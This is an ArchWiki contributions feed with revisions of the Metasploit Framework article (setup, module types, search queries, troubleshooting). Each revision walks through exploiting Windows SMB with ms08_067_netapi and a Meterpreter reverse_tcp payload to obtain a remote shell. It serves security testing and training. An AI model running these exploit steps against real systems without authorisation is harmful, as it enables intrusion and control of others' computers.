https://wiki.archlinux.org/api.php?action=feedcontributions&user=Blastitt&feedformat=atomArchWiki - User contributions [en]2024-03-29T12:32:10ZUser contributionsMediaWiki 1.41.0https://wiki.archlinux.org/index.php?title=Metasploit_Framework&diff=388333Metasploit Framework2015-07-27T03:51:23Z<p>Blastitt: Added section on setting up RVM in order to run msfconsole.</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Security]]<br />
{{Expansion|Meterpreter; More/better SQL search examples; More commands; Module development;}}<br />
<br />
From [http://www.offensive-security.com/metasploit-unleashed/Introduction the official site]:<br />
:''Consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. The Metasploit Framework provides a truly impressive work environment. The MSF is far more than just a collection of exploits, it's an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel.''<br />
<br />
Currently, Metasploit requires to setup and configure Postgresql on target system to work.<br />
This wiki will show how to get metasploit working with a Postgresql database.<br />
<br />
== Installation ==<br />
<br />
Install {{AUR|metasploit}} from [[AUR]].<br />
<br />
For latest development version, install {{AUR|metasploit-git}} instead.<br />
<br />
=== RVM ===<br />
<br />
Msfconsole requires [[Ruby]] and some [[Ruby#RubyGems]] to run without error.<br />
<br />
Follow the [[RVM#Installing_RVM]] and [[RVM#Using_RVM]] articles to install and use Ruby version 2.1.5 and set it to default.<br />
<br />
Once complete, source the newly created RVM installation:<br />
<br />
$ source ~/.rvm/scripts/rvm<br />
<br />
<br />
and install all gems necessary to run Msfconsole using [[Ruby#Bundler]]:<br />
<br />
$ gem install bundler<br />
<br />
$ bundle install<br />
<br />
{{Note|Using a version of Ruby older than 2.1.5 will result in the failure to install the {{ic|metasploit-concern}} gem.}}<br />
<br />
== Setting up the database ==<br />
<br />
{{Note|Commands which must be run from {{ic|msfconsole}} will be prefixed with {{ic|msf >}} in this article.}}<br />
<br />
Metasploit can be used without a database, but cache operations like searching would be very slow. This section shows how to set up Metasploit with ''Postgresql'' database server.<br />
<br />
Follow the [[PostgreSQL]] article and create a new database called {{ic|msf}}. Any database name can be used, but this article will follow {{ic|msf}}.<br />
<br />
Start {{ic|msfconsole}} and type:<br />
<br />
msf > db_connect ''user''@msf<br />
<br />
where ''user'' is the database owner's name (usually your linux user's name).<br />
<br />
Rebuild the database cache:<br />
<br />
msf > db_rebuild_cache<br />
<br />
Metasploit will rebuild the cache in the background, and you can continue running commands meanwhile.<br />
<br />
{{Tip|It might take a few minutes to rebuild the cache the first time. Run {{ic|top}} or {{Pkg|htop}} to monitor the status of cache building. During the process, Ruby/Postgres/Metasploit processes will eat up 50% of CPU time.}}<br />
<br />
Currently Metasploit requires running the {{ic|db_connect}} command every time {{ic|msfconsole}} is started. To avoid typing that command every time, simply put this alias in your shell startup file, for example {{ic|~/.bashrc}}:<br />
<br />
alias msfconsole="msfconsole --quiet -x \"db_connect ${USER}@msf\""<br />
<br />
where the {{ic|quiet}} option will [[#Disable the ASCII banner on startup]], and the {{ic|-x}} command runs the given command right after startup.<br />
<br />
Another workaround for this is to create a {{ic|database.yml}} file in the {{ic|.msf4}} directory. For example:<br />
<br />
{{hc|~/.msf4/database.yml|<br />
production:<br />
adapter: postgresql<br />
database: msf<br />
username: ${USER}<br />
password: ${PASS}<br />
host: localhost<br />
port: 5432<br />
pool: 5<br />
timeout: 5<br />
}}<br />
<br />
<br />
{{Note|The database cache needs to be built only once. Later on upon startup, {{ic|msfconsole}} will say {{ic|[*] Rebuilding the module cache in the background...}}, but it will actually only update the changes. If no changes are made to the database, it will take only half a second.}}<br />
<br />
Run {{ic|db_status}} to verify that database connection is properly established:<br />
<br />
{{hc|msf > db_status|<br />
[*] postgresql connected to msf<br />
}}<br />
<br />
== Usage ==<br />
<br />
There are several interfaces available for Metasploit. This section will explain how to use {{ic|msfconsole}}, the interface that provides the most features available in MSF.<br />
<br />
To start it, simply type {{ic|msfconsole}}. The prompt will change to {{ic|msf >}} to indicate it's waiting for commands.<br />
<br />
{{Tip|Besides additional Metasploit commands explained below, all the regular shell commands and scripts found in {{ic|$PATH}} are available too! (except for aliases)}}<br />
<br />
=== Module types ===<br />
<br />
Everything (scripts, files, programs etc) in Metasploit is a module. There are 6 types of modules:<br />
<br />
* {{ic|auxiliary}} - Modules for helping the attacker in various tasks, like [[Nmap|port scanning]], version detection or network traffic analysis<br />
* {{ic|exploit}} - The code that takes advantage of a vulnerability and allows the execution of the payload, like triggering buffer overflow or bypassing authentication<br />
* {{ic|payload}} - The thing that has to be done right after a successful exploit, like establishing a remote connection, starting a meterpreter session or executing some shell commands<br />
* {{ic|post}} - Various programs that can be run after successful exploitation and remote connection, like collecting passwords, setting up keyloggers or downloading files<br />
* {{ic|encoder}} - Programs for performing encryption<br />
* {{ic|nop}} - ''NOP'' generators. ''NOP'' is an assembly language instruction which simply does nothing. The machine code of this instruction is different on each hardware architecture. ''NOP'' instructions are useful for filling the void in executables.<br />
<br />
=== Searching for exploits ===<br />
<br />
{{Note|Currently the {{ic|search}} command [[#Bugs|does not work properly]]. Refer to [[#Searching from the database]] for a workaround.}}<br />
<br />
To discover what operating system and software version a target runs, perform a [[Nmap|port scan]]. With this information, use the {{ic|search}} command to search for available exploits.<br />
<br />
For example, to search for all exploits on Linux platform of Novell:<br />
<br />
msf > search platform:linux type:exploit name:Novell<br />
<br />
To search for specific field, type it's name, followed by column and the phrase. The following search fields are available:<br />
<br />
{| class="wikitable"<br />
! style=white-space:nowrap | Search field<br />
! style=white-space:nowrap | Matches<br />
! style=white-space:nowrap | Possible values<br />
! style=white-space:nowrap | DB table & column<br />
|-<br />
| {{ic|app}}<br />
| style=white-space:nowrap | Passive (client) or Active (server) exploits<br />
| {{ic|client}}, {{ic|server}}<br />
| style=white-space:nowrap | {{ic|module_details.stance}}<br />
|-<br />
| {{ic|author}}<br />
| style=white-space:nowrap | Name and email of module Author<br />
| Any phrase<br />
| style=white-space:nowrap | {{ic|module_authors.name}}<br />
|-<br />
| {{ic|type}}<br />
| style=white-space:nowrap | The [[#Module types|module type]]<br />
| {{ic|auxiliary}}, {{ic|exploit}}, {{ic|payload}}, {{ic|post}}, {{ic|encoder}}, {{ic|nop}}<br />
| style=white-space:nowrap | {{ic|module_details.mtype}}<br />
|-<br />
| {{ic|name}}<br />
| style=white-space:nowrap | The path (Name) and the short description<br />
| Any phrase<br />
| {{ic|module_details.fullname}}, {{ic|module_details.name}}<br />
|-<br />
| {{ic|platform}}<br />
| style=white-space:nowrap | The target hardware or software platform<br />
| {{ic|bsdi}}, {{ic|netware}}, {{ic|linux}}, {{ic|hpux}}, {{ic|irix}}, {{ic|osx}}, {{ic|bsd}}, {{ic|platform}}, {{ic|java}}, {{ic|javascript}}, {{ic|unix}}, {{ic|php}}, {{ic|firefox}}, {{ic|nodejs}}, {{ic|ruby}}, {{ic|cisco}}, {{ic|android}}, {{ic|aix}}, {{ic|windows}}, {{ic|python}}, {{ic|solaris}}<br />
| style=white-space:nowrap | {{ic|module_platforms.name}}<br />
|-<br />
| {{ic|bid}}, {{ic|cve}}, {{ic|edb}}, {{ic|osvdb}} or {{ic|ref}}<br />
| The [http://www.securityfocus.com/ Bugtraq], [http://www.cvedetails.com/ CVE], [http://www.exploit-db.com/ Exploit-DB], [http://www.osvdb.org/ OSBDB] ID or any<br />
| Exploit database entry ID, or a part of upstream report URL<br />
| style=white-space:nowrap | {{ic|module_refs.name}}<br />
|-<br />
| (No field)<br />
| All of the above except {{ic|app}} and {{ic|type}}<br />
| Any phrase<br />
| All of the above<br />
|}<br />
<br />
See [[#Searching from the database]] and [[#Database search examples]] for more advanced search queries.<br />
<br />
=== Using an exploit ===<br />
<br />
After choosing an appropriate exploit, it's time to start hacking!<br />
<br />
First, select an exploit using the {{ic|use}} command:<br />
<br />
msf > use exploit/windows/smb/ms08_067_netapi<br />
<br />
{{Note|{{ic|ms08_067_netapi}} is one of the most popular exploits affecting Windows XP and Windows Server 2003 SMB services. It was disclosed in 2008 and proves to be very reliable in exploiting unpatched systems which have firewalls disabled.}}<br />
<br />
To view information about a module, use the {{ic|info}} command:<br />
<br />
msf exploit(ms08_067_netapi) > info exploit/windows/smb/ms08_067_netapi<br />
<br />
Running {{ic|info}} without arguments will show info about currently selected module.<br />
<br />
To view the selected exploit's options, run:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
...<br />
}}<br />
<br />
All the required fields must be provided before exploitation. Here, only the {{ic|RHOST}} variable must be specified. To assign a value to a variable use the {{ic|set}} command:<br />
<br />
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102<br />
<br />
Now choose the payload:<br />
<br />
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp<br />
<br />
{{Note|Meterpreter is a command shell built into Metasploit and allows the attacker to run remote commands on exploited systems. Reverse TCP is technique when the exploited computer establishes a connection back to the computer it was exploited from.}}<br />
<br />
Choosing a payload (actually, choosing modules in general) will add more options. Run {{ic|show optons}} again:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST 192.168.56.102 yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)<br />
LHOST yes The listen address<br />
LPORT 4444 yes The listen port<br />
}}<br />
<br />
Now assign {{ic|LHOST}} variable to the address of your computer, where the exploited computer will send connection requests to:<br />
<br />
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1<br />
<br />
Now launch the attack!<br />
<br />
msf exploit(ms08_067_netapi) > exploit<br />
<br />
If you are lucky, you will be dropped to a Meterpreter session where you can do anything on the remote computer. See [[#Meterpreter]] for available commands.<br />
<br />
== Bugs ==<br />
<br />
=== Search does not filter properly ===<br />
<br />
Currently the {{ic|search}} command in {{ic|msfconsole}} does not properly filter the results if more than 1 filters are specified. See [https://dev.metasploit.com/redmine/issues/8822 the bug report] for details.<br />
<br />
See [[#Searching from the database]] for a workaround.<br />
<br />
== Tips and tricks ==<br />
<br />
=== Searching from the database ===<br />
<br />
Since everything in Metasploit is stored in a database, it's easy to make powerful search queries without the need of the {{ic|search}} frontend command.<br />
<br />
To start the database interface, run:<br />
<br />
$ psql msf<br />
<br />
The information about modules is stored in 8 tables:<br />
<br />
{| class="wikitable"<br />
!Table Name<br />
!Contents<br />
|-<br />
|{{ic|module_details}}<br />
|The "main" table, describes various details of each module<br />
|-<br />
|{{ic|module_actions}}<br />
|The action names of ''auxiliary'' modules<br />
|-<br />
|{{ic|module_archs}}<br />
|The target hardware architecture or software platform<br />
|-<br />
|{{ic|module_authors}}<br />
|Names and emails of module author<br />
|-<br />
|{{ic|module_mixins}}<br />
|Empty (???)<br />
|-<br />
|{{ic|module_platforms}}<br />
|The target operating system. See also [[#Popularity of a platform by number of exploits]]<br />
|-<br />
|{{ic|module_refs}}<br />
|References to various online exploit databases and reports <br />
|-<br />
|{{ic|module_targets}}<br />
|The target program name and version of the ''exploit''<br />
|}<br />
<br />
{{Tip|To see what type of details (columns) a table contains, run {{ic|\d+ ''table_name''}}. For example: {{ic|\d+ module_details}}.}}<br />
<br />
Almost all tables have 3 columns: {{ic|id}}, {{ic|detail_id}} and {{ic|name}}, except for {{ic|module_details}} table which has 16 columns.<br />
<br />
The {{ic|detail_id}} values are pointers to the rows of {{ic|module_details}} table.<br />
<br />
To see the all the contents of a table, run:<br />
<br />
SELECT * FROM ''table_name'';<br />
<br />
Multiple:<br />
<br />
* Architecture<br />
* Platform<br />
* Target<br />
<br />
Module options:<br />
<br />
* module type<br />
* stance<br />
* privileged<br />
* path<br />
* name<br />
* refname<br />
* rank<br />
* privileged<br />
* disclosure date<br />
<br />
=== Database search examples ===<br />
<br />
The {{ic|module_details}} table contains multiple columns and viewing them all at once is not convenient. To show only basic information about the modules:<br />
<br />
SELECT id, mtype, refname, disclosure_date, rank, stance, name<br />
FROM module_details;<br />
<br />
Show some information about available modules, include platform information from {{ic|module_platforms}}:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id;<br />
<br />
Show all client (aggressive) exploits for Windows platform:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive';<br />
<br />
Show all exploits for Windows platform with rank >= 500 disclosed after 2013:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND rank >= 500<br />
AND disclosure_date >= TIMESTAMP '2013-1-1';<br />
<br />
Show all aggressive (client) exploits for Windows platform with rank >= 500 and include additional information about module's target:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, module_details.name, DATE(disclosure_date), rank, module_targets.name as target<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id JOIN module_targets on module_details.id = module_targets.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive'<br />
AND rank >= 500<br />
order by target;<br />
<br />
=== Popularity of a platform by number of exploits ===<br />
<br />
To view the possible {{ic|platform}} values, and number of available exploits, run from {{ic|psql}}:<br />
<br />
SELECT name, count(*)<br />
FROM module_platforms<br />
GROUP BY name<br />
ORDER BY count DESC;<br />
<br />
=== Disable the ASCII banner on startup ===<br />
<br />
To disable the banner, run {{ic|msfconsole}} with {{ic|-q}}/{{ic|--quiet}} argument:<br />
<br />
$ msfconsole --quiet<br />
<br />
=== Preserve variable values between sessions ===<br />
<br />
If you don't want the variables to reset when selecting another module and when rerunning {{ic|msfconsole}} then set it globally via {{ic|setg}}, for example:<br />
<br />
msf > setg RHOST 192.168.56.102<br />
<br />
== Troubleshooting ==<br />
<br />
=== Cannot click in VNC viewer ===<br />
<br />
If you selected VNC viewer as a payload, but are unable to click or do any actions, that means you forgot to set the {{ic|ViewOnly}} variable to false. To fix this problem, re-run the exploit with the variable set to {{ic|false}}:<br />
<br />
msf > set ViewOnly false<br />
<br />
=== cannot load such file -- robots (LoadError) ===<br />
<br />
If you get an error like this:<br />
<br />
~/metasploit-framework/lib/metasploit/framework.rb:19:in `require': cannot load such file -- robots (LoadError)<br />
from ~/metasploit-framework/lib/metasploit/framework.rb:19:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `const_get'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `block in constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `each'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/core_ext/string/inflections.rb:54:in `constantize'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'<br />
from ./msfconsole:48:in `<main>'<br />
<br />
This happens because the file {{ic|robots.rb}} has incorrect permissions and can be read only by the root user (see [https://github.com/fizx/robots/issues/6 the bug report]):<br />
<br />
{{hc|$ ls -l /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib|<br />
total 4<br />
-rw-r----- 1 root root 3174 Oct 19 16:47 robots.rb<br />
}}<br />
<br />
To fix this, simply change the permission to be world-readable:<br />
<br />
# chmod o+r /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib/robots.rb<br />
<br />
=== db_connect fails silently ===<br />
<br />
If upon running {{ic|db_connect}} you see no output, but later getting a message like this:<br />
<br />
[!] Database not connected or cache not built, using slow search<br />
<br />
that probably means that the {{ic|postgresql}} service is not running.<br />
<br />
== See also ==<br />
<br />
* [http://www.offensive-security.com/metasploit-unleashed/Main_Page Metasploit Unleashed security training]<br />
* [https://github.com/rapid7/metasploit-framework/wiki Metasploit wiki on GitHub]<br />
* [http://en.wikibooks.org/wiki/Metasploit The Metasploit Book]</div>Blastitthttps://wiki.archlinux.org/index.php?title=User:Blastitt&diff=388330User:Blastitt2015-07-27T03:07:53Z<p>Blastitt: Created page with "You can probably find me on the #archlinux IRC channel."</p>
<hr />
<div>You can probably find me on the #archlinux [[IRC channel]].</div>Blastitthttps://wiki.archlinux.org/index.php?title=Metasploit_Framework&diff=388329Metasploit Framework2015-07-27T02:58:41Z<p>Blastitt: Added creation of database.yml file: Alternative to manually connecting to database on msfconsole start.</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Security]]<br />
{{Expansion|Meterpreter; More/better SQL search examples; More commands; Module development;}}<br />
<br />
From [http://www.offensive-security.com/metasploit-unleashed/Introduction the official site]:<br />
:''Consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins. The Metasploit Framework provides a truly impressive work environment. The MSF is far more than just a collection of exploits, it's an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel.''<br />
<br />
Currently, Metasploit requires to setup and configure Postgresql on target system to work.<br />
This wiki will show how to get metasploit working with a Postgresql database.<br />
<br />
== Installation ==<br />
<br />
Install {{AUR|metasploit}} from [[AUR]].<br />
<br />
For latest development version, install {{AUR|metasploit-git}} instead.<br />
<br />
== Setting up the database ==<br />
<br />
{{Note|Commands which must be run from {{ic|msfconsole}} will be prefixed with {{ic|msf >}} in this article.}}<br />
<br />
Metasploit can be used without a database, but cache operations like searching would be very slow. This section shows how to set up Metasploit with ''Postgresql'' database server.<br />
<br />
Follow the [[PostgreSQL]] article and create a new database called {{ic|msf}}. Any database name can be used, but this article will follow {{ic|msf}}.<br />
<br />
Start {{ic|msfconsole}} and type:<br />
<br />
msf > db_connect ''user''@msf<br />
<br />
where ''user'' is the database owner's name (usually your linux user's name).<br />
<br />
Rebuild the database cache:<br />
<br />
msf > db_rebuild_cache<br />
<br />
Metasploit will rebuild the cache in the background, and you can continue running commands meanwhile.<br />
<br />
{{Tip|It might take a few minutes to rebuild the cache the first time. Run {{ic|top}} or {{Pkg|htop}} to monitor the status of cache building. During the process, Ruby/Postgres/Metasploit processes will eat up 50% of CPU time.}}<br />
<br />
Currently Metasploit requires running the {{ic|db_connect}} command every time {{ic|msfconsole}} is started. To avoid typing that command every time, simply put this alias in your shell startup file, for example {{ic|~/.bashrc}}:<br />
<br />
alias msfconsole="msfconsole --quiet -x \"db_connect ${USER}@msf\""<br />
<br />
where the {{ic|quiet}} option will [[#Disable the ASCII banner on startup]], and the {{ic|-x}} command runs the given command right after startup.<br />
<br />
Another workaround for this is to create a {{ic|database.yml}} file in the {{ic|.msf4}} directory. For example:<br />
<br />
{{hc|~/.msf4/database.yml|<br />
production:<br />
adapter: postgresql<br />
database: msf<br />
username: ${USER}<br />
password: ${PASS}<br />
host: localhost<br />
port: 5432<br />
pool: 5<br />
timeout: 5<br />
}}<br />
<br />
<br />
{{Note|The database cache needs to be built only once. Later on upon startup, {{ic|msfconsole}} will say {{ic|[*] Rebuilding the module cache in the background...}}, but it will actually only update the changes. If no changes are made to the database, it will take only half a second.}}<br />
<br />
Run {{ic|db_status}} to verify that database connection is properly established:<br />
<br />
{{hc|msf > db_status|<br />
[*] postgresql connected to msf<br />
}}<br />
<br />
== Usage ==<br />
<br />
There are several interfaces available for Metasploit. This section will explain how to use {{ic|msfconsole}}, the interface that provides the most features available in MSF.<br />
<br />
To start it, simply type {{ic|msfconsole}}. The prompt will change to {{ic|msf >}} to indicate it's waiting for commands.<br />
<br />
{{Tip|Besides additional Metasploit commands explained below, all the regular shell commands and scripts found in {{ic|$PATH}} are available too! (except for aliases)}}<br />
<br />
=== Module types ===<br />
<br />
Everything (scripts, files, programs etc) in Metasploit is a module. There are 6 types of modules:<br />
<br />
* {{ic|auxiliary}} - Modules for helping the attacker in various tasks, like [[Nmap|port scanning]], version detection or network traffic analysis<br />
* {{ic|exploit}} - The code that takes advantage of a vulnerability and allows the execution of the payload, like triggering buffer overflow or bypassing authentication<br />
* {{ic|payload}} - The thing that has to be done right after a successful exploit, like establishing a remote connection, starting a meterpreter session or executing some shell commands<br />
* {{ic|post}} - Various programs that can be run after successful exploitation and remote connection, like collecting passwords, setting up keyloggers or downloading files<br />
* {{ic|encoder}} - Programs for performing encryption<br />
* {{ic|nop}} - ''NOP'' generators. ''NOP'' is an assembly language instruction which simply does nothing. The machine code of this instruction is different on each hardware architecture. ''NOP'' instructions are useful for filling the void in executables.<br />
<br />
=== Searching for exploits ===<br />
<br />
{{Note|Currently the {{ic|search}} command [[#Bugs|does not work properly]]. Refer to [[#Searching from the database]] for a workaround.}}<br />
<br />
To discover what operating system and software version a target runs, perform a [[Nmap|port scan]]. With this information, use the {{ic|search}} command to search for available exploits.<br />
<br />
For example, to search for all exploits on Linux platform of Novell:<br />
<br />
msf > search platform:linux type:exploit name:Novell<br />
<br />
To search for specific field, type it's name, followed by column and the phrase. The following search fields are available:<br />
<br />
{| class="wikitable"<br />
! style=white-space:nowrap | Search field<br />
! style=white-space:nowrap | Matches<br />
! style=white-space:nowrap | Possible values<br />
! style=white-space:nowrap | DB table & column<br />
|-<br />
| {{ic|app}}<br />
| style=white-space:nowrap | Passive (client) or Active (server) exploits<br />
| {{ic|client}}, {{ic|server}}<br />
| style=white-space:nowrap | {{ic|module_details.stance}}<br />
|-<br />
| {{ic|author}}<br />
| style=white-space:nowrap | Name and email of module Author<br />
| Any phrase<br />
| style=white-space:nowrap | {{ic|module_authors.name}}<br />
|-<br />
| {{ic|type}}<br />
| style=white-space:nowrap | The [[#Module types|module type]]<br />
| {{ic|auxiliary}}, {{ic|exploit}}, {{ic|payload}}, {{ic|post}}, {{ic|encoder}}, {{ic|nop}}<br />
| style=white-space:nowrap | {{ic|module_details.mtype}}<br />
|-<br />
| {{ic|name}}<br />
| style=white-space:nowrap | The path (Name) and the short description<br />
| Any phrase<br />
| {{ic|module_details.fullname}}, {{ic|module_details.name}}<br />
|-<br />
| {{ic|platform}}<br />
| style=white-space:nowrap | The target hardware or software platform<br />
| {{ic|bsdi}}, {{ic|netware}}, {{ic|linux}}, {{ic|hpux}}, {{ic|irix}}, {{ic|osx}}, {{ic|bsd}}, {{ic|platform}}, {{ic|java}}, {{ic|javascript}}, {{ic|unix}}, {{ic|php}}, {{ic|firefox}}, {{ic|nodejs}}, {{ic|ruby}}, {{ic|cisco}}, {{ic|android}}, {{ic|aix}}, {{ic|windows}}, {{ic|python}}, {{ic|solaris}}<br />
| style=white-space:nowrap | {{ic|module_platforms.name}}<br />
|-<br />
| {{ic|bid}}, {{ic|cve}}, {{ic|edb}}, {{ic|osvdb}} or {{ic|ref}}<br />
| The [http://www.securityfocus.com/ Bugtraq], [http://www.cvedetails.com/ CVE], [http://www.exploit-db.com/ Exploit-DB], [http://www.osvdb.org/ OSBDB] ID or any<br />
| Exploit database entry ID, or a part of upstream report URL<br />
| style=white-space:nowrap | {{ic|module_refs.name}}<br />
|-<br />
| (No field)<br />
| All of the above except {{ic|app}} and {{ic|type}}<br />
| Any phrase<br />
| All of the above<br />
|}<br />
<br />
See [[#Searching from the database]] and [[#Database search examples]] for more advanced search queries.<br />
<br />
=== Using an exploit ===<br />
<br />
After choosing an appropriate exploit, it's time to start hacking!<br />
<br />
First, select an exploit using the {{ic|use}} command:<br />
<br />
msf > use exploit/windows/smb/ms08_067_netapi<br />
<br />
{{Note|{{ic|ms08_067_netapi}} is one of the most popular exploits affecting Windows XP and Windows Server 2003 SMB services. It was disclosed in 2008 and proves to be very reliable in exploiting unpatched systems which have firewalls disabled.}}<br />
<br />
To view information about a module, use the {{ic|info}} command:<br />
<br />
msf exploit(ms08_067_netapi) > info exploit/windows/smb/ms08_067_netapi<br />
<br />
Running {{ic|info}} without arguments will show info about currently selected module.<br />
<br />
To view the selected exploit's options, run:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
...<br />
}}<br />
<br />
All the required fields must be provided before exploitation. Here, only the {{ic|RHOST}} variable must be specified. To assign a value to a variable use the {{ic|set}} command:<br />
<br />
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102<br />
<br />
Now choose the payload:<br />
<br />
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp<br />
<br />
{{Note|Meterpreter is a command shell built into Metasploit and allows the attacker to run remote commands on exploited systems. Reverse TCP is technique when the exploited computer establishes a connection back to the computer it was exploited from.}}<br />
<br />
Choosing a payload (actually, choosing modules in general) will add more options. Run {{ic|show optons}} again:<br />
<br />
{{hc|msf exploit(ms08_067_netapi) > show options|<br />
Module options (exploit/windows/smb/ms08_067_netapi):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
RHOST 192.168.56.102 yes The target address<br />
RPORT 445 yes Set the SMB service port<br />
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)<br />
<br />
<br />
Payload options (windows/meterpreter/reverse_tcp):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)<br />
LHOST yes The listen address<br />
LPORT 4444 yes The listen port<br />
}}<br />
<br />
Now assign {{ic|LHOST}} variable to the address of your computer, where the exploited computer will send connection requests to:<br />
<br />
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1<br />
<br />
Now launch the attack!<br />
<br />
msf exploit(ms08_067_netapi) > exploit<br />
<br />
If you are lucky, you will be dropped to a Meterpreter session where you can do anything on the remote computer. See [[#Meterpreter]] for available commands.<br />
<br />
== Bugs ==<br />
<br />
=== Search does not filter properly ===<br />
<br />
Currently the {{ic|search}} command in {{ic|msfconsole}} does not properly filter the results if more than 1 filters are specified. See [https://dev.metasploit.com/redmine/issues/8822 the bug report] for details.<br />
<br />
See [[#Searching from the database]] for a workaround.<br />
<br />
== Tips and tricks ==<br />
<br />
=== Searching from the database ===<br />
<br />
Since everything in Metasploit is stored in a database, it's easy to make powerful search queries without the need of the {{ic|search}} frontend command.<br />
<br />
To start the database interface, run:<br />
<br />
$ psql msf<br />
<br />
The information about modules is stored in 8 tables:<br />
<br />
{| class="wikitable"<br />
!Table Name<br />
!Contents<br />
|-<br />
|{{ic|module_details}}<br />
|The "main" table, describes various details of each module<br />
|-<br />
|{{ic|module_actions}}<br />
|The action names of ''auxiliary'' modules<br />
|-<br />
|{{ic|module_archs}}<br />
|The target hardware architecture or software platform<br />
|-<br />
|{{ic|module_authors}}<br />
|Names and emails of module author<br />
|-<br />
|{{ic|module_mixins}}<br />
|Empty (???)<br />
|-<br />
|{{ic|module_platforms}}<br />
|The target operating system. See also [[#Popularity of a platform by number of exploits]]<br />
|-<br />
|{{ic|module_refs}}<br />
|References to various online exploit databases and reports <br />
|-<br />
|{{ic|module_targets}}<br />
|The target program name and version of the ''exploit''<br />
|}<br />
<br />
{{Tip|To see what type of details (columns) a table contains, run {{ic|\d+ ''table_name''}}. For example: {{ic|\d+ module_details}}.}}<br />
<br />
Almost all tables have 3 columns: {{ic|id}}, {{ic|detail_id}} and {{ic|name}}, except for {{ic|module_details}} table which has 16 columns.<br />
<br />
The {{ic|detail_id}} values are pointers to the rows of {{ic|module_details}} table.<br />
<br />
To see the all the contents of a table, run:<br />
<br />
SELECT * FROM ''table_name'';<br />
<br />
Multiple:<br />
<br />
* Architecture<br />
* Platform<br />
* Target<br />
<br />
Module options:<br />
<br />
* module type<br />
* stance<br />
* privileged<br />
* path<br />
* name<br />
* refname<br />
* rank<br />
* privileged<br />
* disclosure date<br />
<br />
=== Database search examples ===<br />
